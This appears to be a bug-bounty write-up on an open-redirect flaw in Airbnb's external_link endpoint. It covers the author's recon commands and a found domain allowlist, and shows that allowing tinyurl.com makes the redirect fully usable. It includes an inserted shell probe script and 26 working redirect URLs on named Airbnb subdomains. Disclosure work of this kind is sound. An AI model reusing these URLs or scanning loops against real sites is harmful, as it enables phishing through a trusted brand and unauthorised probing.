Hello everyone. I was doing recon on Airbnb with an automated process for finding open-redirect issues. I found the issue on 94 subdomains, but it was marked "Not Applicable" even though I showed them a PoC of complete exploitation using TinyURL.
Reason: “external_link endpoint is working as intended”
Note: nothing in the out-of-scope section mentions this issue or this parameter.
So how did I find it?
I used the commands below:
cat airbnb_subdomain.txt | waybackurls | tee -a waybackurls.txt
cat waybackurls.txt | grep -a -i '=http' | qsreplace 'google.com' | while read -r host; do curl -s -L "$host" | grep -q "google.com" && printf '%s \033[0;31mVulnerable\033[0m\n' "$host"; done | tee -a openredirect.txt
Sometimes a company only allows certain domains for redirection (an allowlist), so a test with an arbitrary domain can miss a redirect that is still exploitable through one of the allowed domains.
Why did I use "google.com"?
Because it is a widely trusted domain and companies load many Google libraries, so it is very often on the allowlist. Once you know that redirection is possible, you can try other methods to bypass the allowlist with other domains.
So after finding the redirection, I brute-forced domains to find which ones Airbnb allows, and found that the following are allowed:
google.com
drive.google.com
facebook.com
youtube.com
twitter.com
instagram.com
tinyurl.com → Interesting domain
box.com
wp.me
medium.com
gov.uk
gofundme.com
wetransfer.com
lemonde.fr
lefigaro.fr
bookmyshow.com
dol.gov
gopro.com
airbnb.com
nejm.org
play.google.com
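The allowlist brute-force described above, as an added example that is not part of the original post or any Airbnb code. It does the same job as the one-liner but reads the first-hop Location header (curl's %{redirect_url}) instead of grepping the followed page body for "google.com", and then checks that the redirect target's host really is the injected domain (or a subdomain of it). The FUZZ placeholder, the domains.txt candidate file and the function names are my own assumptions; the URL shape mirrors the external_link endpoint shown on this page, and a live run needs network access.

```shell
#!/bin/sh
# Open-redirect allowlist probe (added example, not the author's tooling).

# Extract the lowercase host from a URL: strip scheme, "//", path/query/fragment,
# userinfo (so "https://google.com@evil.com" yields evil.com) and port.
host_of() {
  printf '%s\n' "$1" |
    sed -E 's|^[A-Za-z][A-Za-z0-9+.-]*://||; s|^//||; s|[/?#].*$||; s|^.*@||; s|:[0-9]*$||' |
    tr 'A-Z' 'a-z'
}

# Print "yes" if the redirect target's host is $2 or a subdomain of $2, else "no".
# A suffix match on the dotted label rejects google.com.evil.com but accepts drive.google.com.
matches_domain() {
  h=$(host_of "$1")
  d=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
  case "$h" in
    "$d"|*".$d") echo yes ;;
    *) echo no ;;
  esac
}

# First hop only: no -L, so curl reports the Location target without following it.
# An empty result means the endpoint did not redirect (blocked domain or error page).
redirect_target() {
  curl -s -o /dev/null -m 10 -w '%{redirect_url}' "$1"
}

# $1: URL containing the literal FUZZ where the host goes (hypothetical placeholder),
#     e.g. 'https://www.airbnb.com/external_link?url=https%3A%2F%2FFUZZ%2F'
# $2: file with one candidate domain per line (hypothetical domains.txt)
probe_allowlist() {
  while IFS= read -r dom; do
    [ -n "$dom" ] || continue
    url=$(printf '%s' "$1" | sed "s/FUZZ/$dom/")   # domains contain no '/' so sed is safe here
    target=$(redirect_target "$url")
    if [ "$(matches_domain "$target" "$dom")" = yes ]; then
      printf '%s\tALLOWED\t%s\n' "$dom" "$target"
    else
      printf '%s\tblocked\n' "$dom"
    fi
  done < "$2"
}

# Only probe when invoked with a template URL and a domain list; otherwise the
# file just defines the functions so they can be sourced or tested offline.
if [ "$#" -ge 2 ]; then
  probe_allowlist "$1" "$2"
fi
```

Run it as `sh probe.sh 'https://www.airbnb.com/external_link?url=https%3A%2F%2FFUZZ%2F' domains.txt`. The body-grep approach in the original one-liner also catches meta-refresh and JavaScript redirects, but it flags any page that merely mentions google.com (analytics snippets, font loaders) as vulnerable; the header check is exact but misses client-side redirects, so use the two as complementary filters and confirm each hit in a browser before reporting.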
As you all know, TinyURL is a URL-shortening service: any short link redirects to whatever destination its creator chose. Allowlisting tinyurl.com therefore turns the allowlist into a full open redirect, because the attacker simply creates a short link pointing at their own site.
Some affected Airbnb subdomains:
https://ar.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://bg.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://es.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://fr.airbnb.be/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://fr.airbnb.ca/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://fr.airbnb.ch/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://ga.airbnb.ie/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://he.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://hi.airbnb.co.in/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://hr.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://it.airbnb.ch/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://ka.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://mk.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://mt.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://mt.airbnb.com.mt/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://sk.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://sq.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://sw.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://th.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://www.airbnb.ae/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://www.airbnb.am/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://www.airbnb.at/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://www.airbnb.az/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://www.airbnb.ba/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://www.airbnb.be/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
https://www.airbnb.ca/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
Impact
Attackers use open redirects widely in social engineering: the phishing link starts with a trusted airbnb.com domain, so victims and URL filters see Airbnb, not the final destination. If an attacker finds an issue on any of the allowlisted websites, they can use it to escalate this one through that domain. If a subdomain takeover is found on any allowlisted domain, the trusted Airbnb link then lands on a host the attacker fully controls, which escalates this issue to XSS or worse on that host.